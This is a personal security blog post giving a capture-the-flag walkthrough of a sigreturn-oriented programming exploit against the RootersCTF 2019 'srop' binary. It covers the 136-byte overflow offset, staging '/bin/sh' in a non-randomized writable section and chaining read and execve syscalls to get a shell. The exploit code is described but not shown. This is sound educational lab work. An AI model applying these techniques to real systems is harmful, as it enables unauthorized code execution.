Skip to main content

Sigreturn Oriented Programming -part 2- challenge (;´༎ຶД༎ຶ`) (day 81)


In the previous post, we are taking a look at the new approach of how we can utilize ROP without taking too much time selected the necessary gadgets using sigreturn oriented programming. But in the example, we purposely leak the stack address to help us execute mprotect function.

what if there is no leaked address? can we still bypass NX and ASLR at the same time using sigreturn?

Of course you can!

To proof it let's try to solve the pwn challenge from rooters CTF(srop). Binary can be downloaded from this link: https://github.com/abs0lut3pwn4g3/RootersCTF2019-challenges/tree/master/pwn/srop



Hmmm, it seems we get a stripped binary. This means the symbol for the function is stripped and it will be harder for us to understand the assembly.



When we run the program we can see that it only shows some prompt and expect an input after we enter some value it doesn't give us anything.

Let's load the binary to Ghidra. If you got stripped binary, the first thing that you need to do is to find the entry() function since it will contain the main function location.

 

from the result, we can see that inside the entry function it calls "FUN_00401000()" and you don't have to worry about the name since it comes from ghidra but all you need to know that it is actually the main function.

 

following the function, we can see that it contain two syscall function. Let's try to run it in gdb to deduce what is this two syscall doing. let's try to put a breakpoint at before each of the syscall


when we hit the breakpoint take a look at the registry value that will act as the parameter


we can see the value of the register that passed to the syscall is matched with the prompt that was given to us earlier so we can conclude that the first syscall is for printf whereas the syscall will be the scanf() to take our input.

Let's try to crash the program by input a long string





cool so we know that we need to provide 136 bytes to take control of the program instruction pointer. Ok, so what is the strategy? since we don't have any information leak that we can use to determine the stack address to put our shellcode in there. Remember the limitation of ASLR?

ASLR only randomizes the stack address, heap, and the dynamic library. So all we need to do is to find the other memory section within the program that is not randomize and we will use this area to stored and execute our shellcode

but where is this location you talking about?



you can list it using vmmap, notice the first three entry from the result this is the location that the ASLR does not randomize.

We can use two calls of sigframe() first one is to store "/bin/sh" value to the third entry location 0x00402000(we stored the string in this location since the permission allow to be writeable) and once it has done we create another sigframe to call execve with parameter of the location "/bin/sh" we just stored at the first sigframe.

Sounds complicated but let's try to write the code first so you can understand it.


this is the first call of the sigframe, notice that we set it to execute read() syscall and the location that we want to store is 0x402040, you can choose any location as long it's at the range of 0x00402000 - 0x00403000. I choose this location since the first few bytes at the beginning of the location is used to store initialized variable(.data), so I think the safest place will be beyond the what is list in the below result



rsp and rbp are set to make sure its big enough to store our input.



when we saved the payload and run it at the binary we can see that we managed to emulate stack to call read function.

Next, all we have to do is just store "/bin/sh\x00" string to the location and build the second the sigframe so that we can call execve so it can execute "/bin/sh"



to call execve through syscall we need to set rax register to be 59 and the first parameter(rdi) needs to be the command that we want to execute.



run the exploit and we got a shell, really cool!

That's all for today, I hope you enjoy this post

References:
https://syedfarazabrar.com/2019-10-12-rooters-ctf-pwn-challenges/#baby-pwn

Labels:

Comments

Post a Comment

Popular posts from this blog

Having fun analyzing nginx log to find malicious attacker in the net (ง'̀-'́)ง (day 37)

  What makes you sleepless at night? is it because of a ghost or scary stories? is it because you have an important meeting tomorrow? or is it because you have an exam? For me, what keeps me up all night is that I keep thinking about what happens to a website that I just created, is it safe from an attacker (certainly not) or did I missing some security adjustments that lead to vulnerability? well I'm not the best secure programmer in the world, I'm still learning and there is a big possibility that I can make a mistake but for me, a mistake can be a valuable investment to myself or yourself to be better so from this idea, I want to know more about what attackers casually do when attacking a website. Here in this post, I'm going to show you how I analyzed attack to the website that I have permission to design and also some interesting findings that I could get from the analysis Background: All of this analysis comes from the traffic that is targeted to th
Post a Comment
Read More »

Utilize Pwntools for crafting ROP chain :') (day 69)

who doesn't like pwntools? it is a very versatile tool and can be customized according to our need using the python script but did you need to know that pwntools itself can help us to automatically craft a rop chain for us? so in this post, I will show you how to make rop chain less painful and make pwntools do all the heavy lifting. To demonstrate this I will use the binary challenge callme 64 bit from ropemporium link: https://ropemporium.com/challenge/callme.html Crashing the app: Like any other exploitation process, we need to crash the program by generating a long string pattern to determine the offset. based on the information from the above figure we can see that we required to provide 40 bytes of offset Fun stuff: now this where the fun stuff began write the following python script: as in the guideline of the challenged said we need to chain the function call by first to call the callme_one function, callme_two function and then callme_three funct
Post a Comment
Read More »

WriteUp PWN tarzan ROP UNICTF ಠ_ಠ (day 61)

So in this post, I'm going to talk about how to solve the Tarzan pwn challenge from UNICTF 2019. Back in the day when the competition is still going I couldn't finish it and don't have any clue to solve this but this time I was able to finish it :) Also in this post, we will be going to be heavily focused on how to utilize pwntools to construct a ROP chain. If you kinda confused about my explanation in this post you can refer to this following youtube video, link: https://www.youtube.com/watch?v=gWU2yOu0COk I build the python script based on this video Ok, let's get started! In this challenge, you will get two binary first go with tarzan and libc-2.29.so by providing .so file it tell us what version library that the target machine is using this could help us to do ROP chain. first, we run the Tarzan binary to get the basic idea of the program work and as you can see it just show you some text, newline and when you try to input something it doesn't gi
Post a Comment
Read More »